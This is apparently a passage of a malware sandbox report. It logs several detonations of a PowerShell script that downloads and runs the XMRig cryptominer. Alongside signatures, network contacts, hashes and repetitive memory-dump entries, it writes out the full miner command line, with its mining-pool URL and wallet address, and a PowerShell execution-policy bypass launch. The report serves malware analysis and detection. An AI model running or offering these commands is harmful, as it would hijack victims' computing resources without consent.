memory/2704-98-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-99-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-100-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-101-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-102-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-103-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-104-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-105-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-106-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-107-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-108-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-109-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-110-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-111-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-112-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-113-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-114-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-115-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
memory/2704-116-0x00007FF6BC6F0000-0x00007FF6BD323000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:21
Platform
win7-20240508-en
Max time kernel
1563s
Max time network
1564s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
Network
Files
memory/2232-4-0x000007FEF55EE000-0x000007FEF55EF000-memory.dmp
memory/2232-5-0x000000001B750000-0x000000001BA32000-memory.dmp
memory/2232-8-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2232-7-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2232-6-0x0000000001F80000-0x0000000001F88000-memory.dmp
memory/2232-9-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2232-10-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2232-11-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
memory/2232-12-0x000007FEF5330000-0x000007FEF5CCD000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:24
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1328 wrote to memory of 3944 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1328 wrote to memory of 3944 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4036,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=4004 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,10373433614523925616,13586256558317053467,262144 --variations-seed-version --mojo-platform-channel-handle=1044 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
Files
memory/1328-0-0x00007FF939B93000-0x00007FF939B95000-memory.dmp
memory/1328-10-0x000001E57FDE0000-0x000001E57FE02000-memory.dmp
memory/1328-11-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i3gnk2nf.l5h.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1328-12-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-14-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/1328-15-0x000001E57E5E0000-0x000001E57E5F2000-memory.dmp
memory/1328-16-0x000001E57E5C0000-0x000001E57E5CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3944-47-0x000002BFE00C0000-0x000002BFE00E0000-memory.dmp
memory/3944-48-0x000002BFE0110000-0x000002BFE0130000-memory.dmp
memory/3944-49-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/1328-50-0x00007FF939B93000-0x00007FF939B95000-memory.dmp
memory/3944-51-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/1328-52-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/3944-53-0x000002BFE19F0000-0x000002BFE1A10000-memory.dmp
memory/3944-54-0x000002BFE1A10000-0x000002BFE1A30000-memory.dmp
memory/1328-56-0x00007FF939B90000-0x00007FF93A651000-memory.dmp
memory/3944-55-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-57-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-58-0x000002BFE19F0000-0x000002BFE1A10000-memory.dmp
memory/3944-59-0x000002BFE1A10000-0x000002BFE1A30000-memory.dmp
memory/3944-60-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-61-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-62-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-63-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-64-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-65-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-66-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-67-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-68-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-69-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-70-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-71-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-72-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-73-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-74-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-75-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-76-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-77-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-78-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-79-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-80-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-81-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-82-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-83-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-84-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-85-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-86-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-87-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-88-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-89-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-90-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-91-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-92-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-93-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-94-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-95-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-96-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-97-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-98-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-99-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-100-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-101-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-102-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-103-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-104-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-105-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-106-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-107-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-108-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-109-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-110-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-111-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-112-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-113-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-114-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-115-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-116-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-117-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
memory/3944-118-0x00007FF7C4480000-0x00007FF7C50B3000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:27
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4520 wrote to memory of 3508 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4520 wrote to memory of 3508 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
Files
memory/4520-3-0x00007FFEFE883000-0x00007FFEFE884000-memory.dmp
memory/4520-5-0x00000188CA280000-0x00000188CA2A2000-memory.dmp
memory/4520-8-0x00000188CA430000-0x00000188CA4A6000-memory.dmp
memory/4520-9-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xkcsgljt.ihk.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4520-22-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp
memory/4520-26-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp
memory/4520-49-0x00000188CA410000-0x00000188CA422000-memory.dmp
memory/4520-62-0x00000188CA400000-0x00000188CA40A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3508-91-0x0000020740D10000-0x0000020740D30000-memory.dmp
memory/3508-92-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/4520-93-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp
memory/4520-95-0x00007FFEFE883000-0x00007FFEFE884000-memory.dmp
memory/3508-94-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/4520-96-0x00007FFEFE880000-0x00007FFEFF26C000-memory.dmp
memory/3508-97-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-98-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-99-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-100-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-101-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-102-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-103-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-104-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-105-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-106-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-107-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-108-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-109-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-110-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-111-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-112-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-113-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-114-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-115-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-116-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-117-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-118-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-119-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-120-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-121-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-122-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-123-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-124-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-125-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-126-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-127-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-128-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-129-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-130-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-131-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-132-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-133-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-134-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-135-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-136-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-137-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-138-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-139-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-140-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-141-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-142-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-143-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
memory/3508-144-0x00007FF6B9B80000-0x00007FF6BA7B3000-memory.dmp
